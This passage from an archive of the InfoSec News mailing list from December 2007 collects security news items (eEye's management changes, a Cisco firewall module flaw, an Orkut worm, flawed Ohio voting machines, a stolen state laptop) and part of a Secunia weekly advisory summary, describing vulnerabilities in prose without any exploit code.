Attackers' motivation may improve, however, as VoIP increases in popularity, something it is doing relentlessly. Hybrid PBX systems -- which handle both VoIP and TDM voice -- account for 64% of all PBX lines sold, according to a December 2007 Infonetics report. Pure IP systems (compare products) account for another 18%. Meanwhile, not everybody agrees with the assessment that VoIP will not suffer a major hit in 2008. "VoIP is, in essence, a time bomb, poised for a massive exploit," says Paul Simmonds, a member of the management board of the Jericho Forum, a user group promoting new principles for secure networking. All contents copyright 1995-2007 Network World, Inc. From alerts at infosecnews.org Wed Dec 19 00:28:07 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:51 2008 Subject: [ISN] eEye Ship Not 'Sinking,' CEO Says Message-ID: http://www.darkreading.com/document.asp?doc_id=141554 By Kelly Jackson Higgins Senior Editor Dark Reading December 17, 2007 eEye Digital Security has had plenty of upheaval this year, with the sudden departure of CEO Ross Brown in April, a round of layoffs and departures of sales and technical staff, and most recently, the quiet exodus of co-founder and CTO Marc Maiffret. (See eEye's Two Releases [1] and Maiffret Says Bye to eEye. [2]) But in an interview earlier today with Dark Reading, eEye CEO Kamal Arafeh said there's nothing to the most recent speculation that Maiffret has jumped a sinking ship. Talk of problems at eEye resurfaced last week after Maiffret disclosed that he had left the company back in September, and soon will launch a new non-security startup. Arafeh says eEye's revenue has actually increased 53 percent over the same period last year, and that it has diversified its customer base beyond the government agencies and large corporations it first targeted with its Retina vulnerability scanner. "We've restructured, and we have a more agile process on the engineering side, and roll out more products on [better] timeframes, and we have more people testing products to make sure they are up to snuff," says Arafeh, the former senior vice president of worldwide sales and marketing who took over the reins after Brown left the privately held company. Arafeh accepts much of the blame for the slowdown this year on the research side of eEye. He says he had to first get up to speed in understanding just how research could play with the company's products. "I had to grow professionally to understand that from our customers' perspective," he says. "We are re-emphasizing it... There's more of an emphasis on research today than there was six months ago." Look for eEye's vulnerability research to go more hand in hand with its products, he says. He says there are still some familiar faces from the company's original research team on board, including Andre Protas, who was recently named director of research and preview services for eEye. Arafeh was unable to divulge any information on the number of employees or the research team, however. But some security experts argue that eEye has not been in the spotlight much over the past year in public vulnerability research like it was the year before, or in its earlier days. Why the delayed announcement of Maiffret's departure? Arafeh says there was no single reason. "It was a combination of him being worried that people would make assumptions similar to what's coming out now [and other factors]," he says. "[People] blew it out of proportion." Maiffret said in an interview last week that he held off on spreading the word about his departure until the transition was complete. Meanwhile, Arafeh says eEye's main source of revenue continues to be its vulnerability assessment tool, Retina, which represents about 60 percent of its business, and that the company is working on expanding into the small- to medium-sized business market here as well. Next for eEye, he says, are more form factors for its products and technologies, including new services. The company also will roll out solutions in '08 that reduce the amount of time it takes to deploy its VA and Blink endpoint products, Arafeh hinted. Arafeh also revealed that in the next few weeks, the company will be moving from its home in Aliso Viejo, Calif., to a new headquarters space on the campus of the University of California-Irvine, where companies such as Cisco and Google also have a presence. [1] http://www.darkreading.com/blog.asp?blog_sectionid=342&doc_id=121064 [2] http://www.darkreading.com/document.asp?doc_id=141256 From alerts at infosecnews.org Thu Dec 20 00:21:15 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:51 2008 Subject: [ISN] Cisco warns of firewall flaw in its Catalyst switches, 7600 Series routers Message-ID: http://www.networkworld.com/news/2007/121907-cisco-firewall-flaw.html By Linda Leung NetworkWorld.com 12/19/07 Cisco is warning that a flaw in its Firewall Services Module could result in a reload of the module, or if exploited repeatedly, could result in a sustained denial-of-service attack. FWSM is an integrated firewall module for Cisco Catalyst 6500 switches and Cisco 7600 Series routers. In its security alert issued Wednesday, Cisco says there are "no known instances of intentional exploitation of this issue," but that it has "observed data streams that appear to be unintentionally triggering this vulnerability." According to the security advisory, the security hole could be "triggered with standard network traffic, which is passed through the Application Layer Protocol Inspection process." The only FWSM release affected by this vulnerability is FWSM System Software version 3.2(3). FWSM software version 3.2(4) contains the fixes for the vulnerability and will be available for download the week beginning Dec. 31 at this URL [1]. A workaround for this vulnerability can be found at the security advisory [2]. All contents copyright 1995-2007 Network World, Inc. [1] http://www.cisco.com/pcgi-bin/tablebuild.pl/cat6000-fwsm?psrtdcat20e2 [2] http://www.cisco.com/en/US/products/products_security_advisory09186a008091b11d.shtml From alerts at infosecnews.org Thu Dec 20 00:21:27 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:51 2008 Subject: [ISN] Ohio Elections Official Calls Machines Flawed Message-ID: Forwarded from: Dave Dittrich InfoSec News wrote: > http://www.nytimes.com/2007/12/15/us/15ohio.html > > By Bob Driehaus > The New York Times > December 15, 2007 > > CINCINNATI - All five voting systems used in Ohio ...have critical > flaws... > At polling stations, teams working on the study were able to pick > locks to access memory cards and use hand-held devices to plug false > vote counts into machines. At boards of election, they were able to > introduce malignant software into servers. > > Ms. Brunner proposed replacing all of the states voting machines, > including the touch-screen ones used in more than 50 of Ohios 88 > counties. So when will we see a call for a refund on the millions of dollars spent on those highly flawed systems after the 2000 election? Or at minimum a legislatively mandated discount that will cap the profits on the next generation? When there is a shortage of funds available for computer security R&D, its a shame to see orders of magnitude more money spent on systems that would have benefited from the R&D had that been done first, not after the problems are discovered. Do we always have to do things backwards? Sigh... -- Dave Dittrich Information Assurance Researcher, dittrich (at) u.washington.edu The iSchool http://staff.washington.edu/dittrich University of Washington PGP key http://staff.washington.edu/dittrich/pgpkey.txt Fingerprint FE97 0C57 0843 F3EB 49A1 0CD0 8E0C D0BE C838 CCB5 From alerts at infosecnews.org Thu Dec 20 00:21:43 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:51 2008 Subject: [ISN] Worm Squirms Through Google's Orkut Message-ID: http://www.eweek.com/article2/0,1895,2237733,00.asp By Ryan Naraine eWEEK.com December 19, 2007 Google's social network is hit by a fast moving worm that is attacking members of a Portuguese-language community. A fast moving worm is squirming though Google's Orkut social network, adding hundreds of thousands of users to an Orkut community created by a Brazilian hacker. The worm, which first appeared on Dec. 19, has been spreading through Orkut's Scrapbook system at a rapid pace, infecting more than 650,000 users in the space of a few hours. According to an alert from anti-virus specialist Trend Micro, infection starts when an Orkut user is sent an e-mail telling them that they have a new Scrapbook entry. Logging into Orkut, the victim is greeted with Portuguese-language text that reads: "2008 vem ai que ele comece mto bem para vc." This translates to "2008 is comingI wish that it begins quite well for you". No interaction is necessary. Simply looking at the scrap starts the infection sequence," says Trend Micro researcher Robert McArdle. Once the scrap is viewed, it deletes itself and the victim is automatically added to the "Infectados pelo Vrus do Orkut" community. Once a user becomes infected, the infected account downloads and executes an embedded Javascript that sends a copy of the original Scrapbook post to all the victim's contacts. According to McAfee researcher Vinay Mahadik, the worm is abusing the ability to add JavaScript content to Orkut Scrapbook entries, a feature that was only recently introduced by Google. "This clearly illustrates the issue with allowing rich-content on social/professional networking sites, and not sanitizing it enough," Mahadik said in an entry on the McAfee Avert Labs blog. This is the second major worm attack to take aim at a popular social network. In October 2005, the Samy worm used cross-site scripting techniques to spread through MySpace, infecting more than a million users in less than a day. From alerts at infosecnews.org Thu Dec 20 00:21:59 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:51 2008 Subject: [ISN] Stolen laptop holds data on seniors Message-ID: http://www.pennlive.com/news/patriotnews/index.ssf?/base/news/1198033089169550.xml&coll=1 By Jan Murphy The Patriot-News December 19, 2007 A state Department of Aging-owned laptop computer containing personal information on nearly 21,000 senior citizens was stolen from a Johnstown home during a Dec. 5 break-in. The computer was issued to a department employee who works with the agencies on aging in Indiana, Union, Snyder and Clearfield counties. The employee was attending a funeral when the theft occurred, said Michele Bell Gopinath, a department spokeswoman. Police suspect the computer was taken for its street value, she said. There have been no reports of misuse of the information, which included names, addresses, Social Security numbers, some medical information and the services clients received, Gopinath said. The affected seniors are in the process of being notified, and credit protection from TransUnion will be provided for 90 days at a cost to the state of $23,000, she said. Seniors then have the option of having the credit protection extended for a year at the state's expense. Information on the computer was double password protected, Gopinath said. When the theft occurred, she said the department was in the process of encrypting computers and has since completed that work to provide additional protection. It also is in the process of centralizing information about clients so that the information does not have to be downloaded onto laptops when employees are out in the field, but that work is not completed, she said. "We believe this was an isolated incident and that the provisions we've taken with contacting TransUnion and contacting the consumers, should give our consumers and clients a sense of safety," Gopinath said. This is the third incident in four months where state-owned computers containing personal information of Pennsylvanians have been stolen. The other two thefts involved computers that contained information on more than 375,000 welfare clients. Jan Murphy: 232-0668 or jmurphy (at) patriot-news.com CONSUMER ALERT Concerned residents can call this toll-free line: 866-592-8622 From alerts at infosecnews.org Thu Dec 20 00:22:17 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:51 2008 Subject: [ISN] Book Review: IT Security Interviews Exposed: Secrets to Landing Your Next Information Security Job Message-ID: http://books.slashdot.org/article.pl?sid=07/12/19/1547202 [ http://www.amazon.com/exec/obidos/ASIN/0471779873/c4iorg - WK] Author: Chris Butler Pages: 218 Publisher: Wiley Rating: 8 Reviewer: Ben Rothke ISBN: 0471779873 Summary Good review for a pro, but not for newbies. If you find information security challenging and either want a job in the field or are looking for a better job in the field, the book will be quite valuable. But for those looking for a hot security job, their lackings will likely show through on in interview, even with the help of this book. As to the actual content, chapter 1 provides a good overview of how to find, interview and get a security job. The chapter contains many bits of helpful information, especially to those whose job seeking skills are deficient. A good piece of advice the author's state is that one should never pay a fee for headhunting services. There are many people that call themselves recruiters, but are nothing more than fax servers who charge for the service. The burden to pay is always on the hiring firm, and a job seeker should be extremely suspicious of anyone requesting a fee to find them a position. I would hope that in future editions of the book, the authors expand on chapter one. The chapter itself in fact could easily me made into a book in its own right. As part of the job search process, many job searchers often do not ask themselves enough fundamental questions if they are indeed in the right place in their career. Such an approach is taken by Lee Kushner, founder and CEO of the information security recruitment firm LJ Kushner and Associates. Kushner formulated the following 7 questions that every information security job candidate should ask themselves: 1. What are my long and short term plans? 2. What are my strengths and weaknesses? 3. What skills do I need to develop? 4. Have I acquired a new skill during the past year? 5. What are my most significant career accomplishments and will I soon achieve another one? 6. Have I been promoted over the past three years? 7. What investments have I made in my own career? The other 9 chapters of the book all have the same format; an overview of the topic, and then various questions and interviewer may pose. The reality that these topics of network and security fundamentals, firewalls, regulations, wireless, security tools, and more, are essential knowledge for a security professional. Anyone trying to go through a comprehensive information security interview and wing it by reviewing the material will likely only succeed if the interviewer is inept. Anyone attempting to mimic the questions and answers in the book in a real-world interview will immediately be found to be a sham if the interviewer deviates even slightly from the script, which should be expected. What really separates a good candidate from a great candidate is hands-on, practical and real-world security experience. Such a candidate won't need a question and answer format to showcase themselves in an interview. Their experience should shine, and not their ability to rattle of security acronyms. If a company is serious about hiring qualified people, the interview process should not be about short technical questions and acronym definitions. It should entail an open discussion with significant give and take. Having a candidate detail their methodology for deploying and configuring a firewall should be given more credence than their ability to define the TCP the three-way handshake. Ultimately, the efficacy of the book is in the disposition of the reader. For the security newbie who wants a crash course in security in order to quickly land a security job, heaven help the company that would hire such a person. While one should indeed not judge a book by its cover; this book's cover and title may lead some readers to think that the book is their golden ticket to a quick landing into a great career. The breadth of information that a security professional needs to know precludes and short of cramming or quick introductions. Those with a lack of security experience attempting to use this book to hide their shortcomings will only embarrass themselves on an interview. On the other hand, for the reader who has a background in information security who wants an update on network and security fundamentals, they will find IT Security Interviews Exposed a helpful title. The book contains a plethora of valuable information written in a clear and easy to read style. In a little over 200 pages, the book is able to provide the reader with a good review of what they know or may have forgotten. Used in such a setting by such a reader makes the book a most helpful tool for the serious security professional looking to advance their career. -=- Ben Rothke is a security consultant with BT INS and the author of Computer Security: 20 Things Every Employee Should Know. From alerts at infosecnews.org Thu Dec 20 00:22:29 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:51 2008 Subject: [ISN] Tiger Team brings haxploitation to TV Message-ID: http://www.theregister.co.uk/2007/12/19/tiger_team/ By John Leyden The Register 19th December 2007 The haxploitation genre is coming to the small screen with a forthcoming series about a team of penetration testers. Tiger Team follows a group of elite freelance security consultants hired to test organisations' security by using social engineering, hacking, and physically defeating security mechanisms. So we expect to see our heroes picking locks and going through the trash to get clues all the while maintaining an uneasy relationship with their clients and law enforcement officials. The plot elements have appeared before in films such as Sneakers [1], starring Robert Redford. It's hard to see how a story arc strong enough to sustain interest over the course of a TV series can be sustained from these elements. The first programme [2] is due to screen at 11pm on Christmas Day on CourtTV, which is hardly a recipe for a large audience. On the plus side, those watching will be probably too sozzled to notice any plot holes or technical errors. A radio interview with the stars of the show - Ryan Jones and Chris Nickerson - by a Denver station can be found here [3]. [1] http://www.imdb.com/title/tt0105435 [2] http://www.courttv.com/onair/shows/upcoming_series/#tiger_team [3] http://preview.tinyurl.com/2lxkr7 From alerts at infosecnews.org Fri Dec 21 01:17:53 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:51 2008 Subject: [ISN] Alleged Wesselman's scammer indicted Message-ID: http://www.courierpress.com/news/2007/dec/19/alleged-wesselmans-scammer-indicted/ By Gavin Lesnick Evansville Courier & Press December 19, 2007 A Seattle woman will face federal charges for allegedly defrauding Wesselman's grocery stores of thousands of dollars. Carima Jansen was indicted by a federal grand jury in Indianapolis for the charges, which were investigated by the Federal Bureau of Investigation. According to a press release issued this morning, the indictment alleges that the crime began when Wesselman's computer system was compromised in Evansville by a program that allowed perpetrators to obtain the user ID and password for the chain's bank account. The program infiltrated the system through a fraudulent e-mail that was purportedly sent by the Better Business Bureau, the release said. Jansen allegedly opened a bank account with a counterfeit passport and then used the information from the program to transfer funds from Wesselman's acount to her own. The release said she transferred $14,672 into the account and then withdrew nearly all of the stolen money in cash. Jansen faces a maximum possible prison sentence of 10 years and a maximum possible fine of $250,000. An initial hearing will be scheduled before a U.S. Magistrate Judge in Evansville Jansen is brought to Indiana by the United States Marshal. She is currently in custody in Washington. From alerts at infosecnews.org Fri Dec 21 01:18:10 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:51 2008 Subject: [ISN] Secunia Weekly Summary - Issue: 2007-51 Message-ID: ======================================================================== The Secunia Weekly Advisory Summary 2007-12-13 - 2007-12-20 This week: 71 advisories ======================================================================== Table of Contents: 1.....................................................Word From Secunia 2....................................................This Week In Brief 3...............................This Weeks Top Ten Most Read Advisories 4.......................................Vulnerabilities Summary Listing 5.......................................Vulnerabilities Content Listing ======================================================================== 1) Word From Secunia: A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. Download and test it today: https://psi.secunia.com/ Read more about this new version: https://psi.secunia.com/?page=changelog ======================================================================== 2) This Week in Brief: Some highly critical vulnerabilities have been reported in Apple QuickTime, which can be exploited by malicious people to compromise a user's system. A boundary error in the handling of QTL files can be exploited to cause a heap-based buffer overflow when a user views a specially crafted QTL file. Various unspecified errors also exist in QuickTime's Flash media handler. Successful exploitation of any of these issues may allow execution of arbitrary code. Quicktime 7.3.1 is patched against these vulnerabilities, and is available for Mac and Windows users. For more information: http://secunia.com/advisories/28092/ The Secunia Personal Software Inspector - Release Candidate 1 is now available, which you can use to check if your personal system is vulnerable: https://psi.secunia.com/ -- Various vulnerabilities in Java have been reported and acknowledged in Mac OS X, which can be exploited by malicious people to bypass certain security restrictions, conduct cross-site scripting attacks, to cause a DoS (Denial of Service), or to compromise a user's system. An error in Java due to an improper access check can be exploited via a specially crafted Java applet to add or remove items from a user's Keychain, without prompting the user. This vulnerability affects Mac OS X versions prior to 10.5. Some vulnerabilities in Java 1.4 and J2SE 5.0 can be exploited to bypass certain security restrictions, conduct cross-site scripting attacks, to cause a DoS (Denial of Service), or to compromise a user's system. Most of these vulnerabilities are known issues in Java from 2006 and 2007. These vulnerabilities are reported in Mac OS X 10.4.10 and Mac OS X Server 10.4.10. Mac OS X v10.5 is reportedly not affected. Java Release 6 for Mac OS X 10.4 is now available for all users to resolve the issues. For more information, including a complete list of Java vulnerabilities: http://secunia.com/advisories/28115/ -- Apple has issued a security update for Mac OS X, which fixes multiple vulnerabilities. Some of these vulnerabilities are due to known vulnerabilities in third-party software (such as Tar, CUPS, perl, and python), while some are vulnerabilities in Mac OS X components. Apple has released Security Update 2007-09 to resolve these issues. Both Mac OS X 10.4 and 10.5 are affected. All users are urged to update their systems immediately. For more information, including the complete list of all vulnerabilities: http://secunia.com/advisories/28136/ -- Some vulnerabilities have been reported in Adobe Flash Player, where one vulnerability has an unknown impact and others can be exploited by malicious, local users to gain escalated privileges and by malicious people to bypass certain security restrictions, conduct cross-site scripting and HTTP request splitting attacks, disclose sensitive information, cause a Denial of Service (DoS), or to potentially compromise a user's system. One of the vulnerabilities is due to the use of vulnerable PCRE code, while another is a vulnerability present in the Flash Player in Opera browsers. Some vulnerabilities may be exploited to allow the execution of arbitrary code, making them highly critical issues. Secunia urges all users to install version 9.0.115.0 to fix these issues. For more information, including the complete list of all vulnerabilities: http://secunia.com/advisories/28161/ The Secunia Personal Software Inspector - Release Candidate 1 is now available, which you can use to check if your personal system is vulnerable: https://psi.secunia.com/ Corporate users can request for a trial of the Secunia Network Software Inspector, which you can use to check which systems in your network are vulnerable: http://secunia.com/network_software_inspector/ -- VIRUS ALERTS: During the past week Secunia collected 116 virus descriptions from the Antivirus vendors. However, none were deemed MEDIUM risk or higher according to the Secunia assessment scale. ======================================================================== 3) This Weeks Top Ten Most Read Advisories: 1. [SA28036] Internet Explorer Multiple Code Execution Vulnerabilities 2. [SA28092] Apple QuickTime Multiple Vulnerabilities 3. [SA28095] SquirrelMail Package Compromise 4. [SA28161] Adobe Flash Player Multiple Vulnerabilities 5. [SA27992] JustSystems Ichitaro Document Processing Buffer Overflow 6. [SA28096] Sun Solaris 10 NFS "netgroups" Security Bypass Vulnerability 7. [SA28048] Mac OS X "cs_validate_page()" Local Denial of Service 8. [SA28072] Kerio WinRoute Firewall Proxy Server Unspecified Security Bypass 9. [SA28059] WebGUI Create Admin Security Bypass 10. [SA27969] TYPO3 "indexed_search" SQL Injection Vulnerability ======================================================================== 4) Vulnerabilities Summary Listing Windows: [SA28144] Rosoft Media Player File Processing Buffer Overflow Vulnerability [SA28134] iMesh IMWebControl Class ActiveX Control Code Execution [SA28120] PeerCast "handshakeHTTP()" Buffer Overflow Vulnerability [SA28160] WFTPD Explorer LIST Reply Buffer Overflow Vulnerability [SA28143] RaidenHTTPD "ulang" Local File Inclusion Vulnerability [SA28111] phPay Local File Inclusion Vulnerability [SA28131] St. Bernard Open File Manager Buffer Overflow Vulnerability [SA28177] HP Software Update ContentCollection Class ActiveX Control Insecure Method [SA28150] Citrix Web Interface Unspecified Cross-Site Scripting Vulnerability [SA28142] SurgeMail Webmail "Host" Header Processing Denial of Service UNIX/Linux: [SA28157] Red Hat update for flash-plugin [SA28136] Apple Mac OS X Security Update Fixes Multiple Vulnerabilities [SA28135] Sun Solaris Firefox / Thunderbird Multiple Vulnerabilities [SA28115] Mac OS X Java Multiple Vulnerabilities [SA28112] Centreon "fileOreonConf" File Inclusion Vulnerabilities [SA28084] HP-UX update for OpenSSL [SA28170] Ubuntu update for kernel [SA28167] IBM AIX Perl Regular Expressions Unicode Data Buffer Overflow [SA28147] Ubuntu update for libgd2 [SA28132] Exiv2 EXIF Parsing Integer Overflow Vulnerability [SA28114] Sun Solaris Gimp Multiple Vulnerabilities [SA28113] Gentoo update for cups [SA28109] Red Hat update for squid [SA28103] Debian update for centericq [SA28101] Debian update for link-grammar [SA28091] Fedora update for squid [SA28090] Gentoo update for ircservices [SA28086] Debian update for mydns [SA28151] Sun Management Center Default Account Security Issue [SA28129] CUPS SNMP Backend "asn1_get_string()" Signedness Vulnerability [SA28089] Avaya Products Samba "send_mailslot()" Buffer Overflow [SA28087] HP-UX DCE swagentd Buffer Overflow Vulnerability [SA28162] Red Hat update for kernel [SA28107] rPath update for tetex [SA28148] Sun Ray Device Manager Daemon Data Manipulation and DoS [SA28108] Slackware update for mysql [SA28099] Red Hat update for mysql [SA28139] Alternate pdftops Filter for CUPS Insecure Temporary Files [SA28123] scponly Command Passthrough Security Bypass [SA28105] Linux Kernel "hrtimer_start()" Integer Overflow Vulnerability [SA28097] Fedora update for autofs [SA28094] Gentoo Portage "etc-update" Information Disclosure [SA28088] rPath update for kernel [SA28181] rPath update for kdebase [SA28104] KDE KDM Local Denial of Service Weakness Other: [SA28175] Cisco Firewall Services Module Denial of Service Vulnerability [SA28100] Juniper JUNOS BGP UPDATE Message Processing Denial of Service [SA28096] Sun Solaris 10 NFS "netgroups" Security Bypass Vulnerability [SA28093] NeoOffice Unspecified OpenOffice.org Vulnerability Cross Platform: [SA28169] Opera Multiple Vulnerabilities [SA28161] Adobe Flash Player Multiple Vulnerabilities [SA28117] ClamAV "cli_scanpe()" MEW Handling Integer Overflow [SA28095] SquirrelMail Package Compromise [SA28092] Apple QuickTime Multiple Vulnerabilities [SA28155] phpMyRealty Two SQL Injection Vulnerabilities [SA28154] Dokeos "My productions" Multiple Extensions File Upload Vulnerability [SA28138] PunBB Automatic Image Upload with Thumbnails Module File Upload [SA28137] LineShout Two Script Insertion Vulnerabilities [SA28126] FreeWebshop.org Admin Credentials Information Disclosure [SA28124] Hammer of Thyrion "HuffDecode()" Buffer Overflow Vulnerability [SA28119] PHP Real Estate Classifieds "id" SQL Injection [SA28110] exiftags Multiple Vulnerabilities [SA28098] CourseMill Learning Management System "user" SQL Injection [SA28164] GF-3XPLORER Cross-Site Scripting and Information Disclosure [SA28149] Asterisk Registration Database Security Bypass [SA28133] Mambo Two Cross-Site Scripting Vulnerabilities [SA28130] WordPress Draft Information Disclosure [SA28122] Google Web Toolkit Benchmark Reporting System Cross-Site Scripting [SA28116] Ganglia Web Interface Multiple Cross-Site Scripting Vulnerabilities [SA28106] Flyspray Two Cross-Site Scripting Vulnerabilities [SA28118] syslog-ng Timestamps Denial of Service Vulnerability ======================================================================== 5) Vulnerabilities Content Listing Windows:-- [SA28144] Rosoft Media Player File Processing Buffer Overflow Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2007-12-19 Juan Pablo Lopez Yacubian has discovered a vulnerability in Rosoft Media Player, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/28144/ -- [SA28134] iMesh IMWebControl Class ActiveX Control Code Execution Critical: Highly critical Where: From remote Impact: System access Released: 2007-12-18 rgod has discovered a vulnerability in iMesh, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/28134/ -- [SA28120] PeerCast "handshakeHTTP()" Buffer Overflow Vulnerability Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2007-12-18 Luigi Auriemma has reported a vulnerability in PeerCast, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28120/ -- [SA28160] WFTPD Explorer LIST Reply Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2007-12-19 r4x has reported a vulnerability in WFTPD Explorer, which potentially can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/28160/ -- [SA28143] RaidenHTTPD "ulang" Local File Inclusion Vulnerability Critical: Moderately critical Where: From remote Impact: Exposure of system information, Exposure of sensitive information Released: 2007-12-18 rgod has discovered a vulnerability in RaidenHTTPD, which can be exploited by malicious people to disclose sensitive information. Full Advisory: http://secunia.com/advisories/28143/ -- [SA28111] phPay Local File Inclusion Vulnerability Critical: Moderately critical Where: From remote Impact: Exposure of system information, Exposure of sensitive information Released: 2007-12-17 Michael Brooks has discovered a vulnerability in phPay, which can be exploited by malicious people to disclose sensitive information. Full Advisory: http://secunia.com/advisories/28111/ -- [SA28131] St. Bernard Open File Manager Buffer Overflow Vulnerability Critical: Moderately critical Where: From local network Impact: System access Released: 2007-12-18 A vulnerability has been reported in St. Bernard Open File Manager, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28131/ -- [SA28177] HP Software Update ContentCollection Class ActiveX Control Insecure Method Critical: Less critical Where: From remote Impact: Manipulation of data Released: 2007-12-20 porkythepig has reported a vulnerability in HP Software Update, which can be exploited by malicious people to overwrite arbitrary files on a user's system. Full Advisory: http://secunia.com/advisories/28177/ -- [SA28150] Citrix Web Interface Unspecified Cross-Site Scripting Vulnerability Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-19 A vulnerability has been reported in Citrix Web Interface, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/28150/ -- [SA28142] SurgeMail Webmail "Host" Header Processing Denial of Service Critical: Less critical Where: From remote Impact: DoS Released: 2007-12-18 rgod has discovered a vulnerability in SurgeMail, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/28142/ UNIX/Linux:-- [SA28157] Red Hat update for flash-plugin Critical: Highly critical Where: From remote Impact: Cross Site Scripting, Manipulation of data, Exposure of sensitive information, Privilege escalation, DoS, System access Released: 2007-12-19 Red Hat has issued an update for flash-plugin. This fixes some vulnerabilities, which can be exploited by malicious, local users to gain escalated privileges and by malicious people to conduct cross-site scripting and HTTP request splitting attacks, disclose sensitive information, cause a Denial of Service (DoS), or to potentially compromise a user's system. Full Advisory: http://secunia.com/advisories/28157/ -- [SA28136] Apple Mac OS X Security Update Fixes Multiple Vulnerabilities Critical: Highly critical Where: From remote Impact: Hijacking, Security Bypass, Cross Site Scripting, Exposure of system information, Exposure of sensitive information, Privilege escalation, DoS, System access Released: 2007-12-18 Apple has issued a security update for Mac OS X, which fixes multiple vulnerabilities. Full Advisory: http://secunia.com/advisories/28136/ -- [SA28135] Sun Solaris Firefox / Thunderbird Multiple Vulnerabilities Critical: Highly critical Where: From remote Impact: Cross Site Scripting, Spoofing, Exposure of sensitive information, DoS, System access Released: 2007-12-19 Sun has acknowledged some vulnerabilities in Sun Solaris, which can be exploited by malicious people to conduct spoofing and cross-site scripting attacks, to disclose sensitive information, and potentially to compromise a user's system. Full Advisory: http://secunia.com/advisories/28135/ -- [SA28115] Mac OS X Java Multiple Vulnerabilities Critical: Highly critical Where: From remote Impact: Security Bypass, Privilege escalation, DoS, System access Released: 2007-12-17 Some vulnerabilities have been reported and acknowledged in Mac OS X, which can be exploited by malicious people to bypass certain security restrictions, conduct cross-site scripting attacks, to cause a DoS (Denial of Service), or to compromise a user's system. Full Advisory: http://secunia.com/advisories/28115/ -- [SA28112] Centreon "fileOreonConf" File Inclusion Vulnerabilities Critical: Highly critical Where: From remote Impact: System access Released: 2007-12-18 Michael Brooks has reported some vulnerabilities in Centreon, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28112/ -- [SA28084] HP-UX update for OpenSSL Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2007-12-14 HP has issued an update for OpenSSL. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28084/ -- [SA28170] Ubuntu update for kernel Critical: Moderately critical Where: From remote Impact: DoS Released: 2007-12-20 Ubuntu has issued an update for the kernel. This fixes some vulnerabilities, which can be exploited by malicious, local users and by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/28170/ -- [SA28167] IBM AIX Perl Regular Expressions Unicode Data Buffer Overflow Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2007-12-19 IBM has acknowledged a vulnerability in AIX, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28167/ -- [SA28147] Ubuntu update for libgd2 Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2007-12-19 Ubuntu has issued an update for libgd2. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise an application using the library. Full Advisory: http://secunia.com/advisories/28147/ -- [SA28132] Exiv2 EXIF Parsing Integer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2007-12-18 A vulnerability has been reported in Exiv2, which can be exploited by malicious people to cause a DoS (Denial of Service) or to potentially compromise an application using the library. Full Advisory: http://secunia.com/advisories/28132/ -- [SA28114] Sun Solaris Gimp Multiple Vulnerabilities Critical: Moderately critical Where: From remote Impact: System access Released: 2007-12-18 Sun has acknowledged some vulnerabilities in Gimp, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/28114/ -- [SA28113] Gentoo update for cups Critical: Moderately critical Where: From remote Impact: Privilege escalation, DoS, System access Released: 2007-12-19 Gentoo has issued an update for cups. This fixes a security issue and some vulnerabilities, which can be exploited by malicious, local users to perform certain actions with escalated privileges and by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/28113/ -- [SA28109] Red Hat update for squid Critical: Moderately critical Where: From remote Impact: DoS Released: 2007-12-19 Red Hat has issued an update for squid. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/28109/ -- [SA28103] Debian update for centericq Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2007-12-17 Debian has issued an update for centericq. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a user's system. Full Advisory: http://secunia.com/advisories/28103/ -- [SA28101] Debian update for link-grammar Critical: Moderately critical Where: From remote Impact: System access Released: 2007-12-18 Debian has issued an update for link-grammar. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/28101/ -- [SA28091] Fedora update for squid Critical: Moderately critical Where: From remote Impact: DoS Released: 2007-12-17 Fedora has issued an update for squid. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/28091/ -- [SA28090] Gentoo update for ircservices Critical: Moderately critical Where: From remote Impact: DoS Released: 2007-12-14 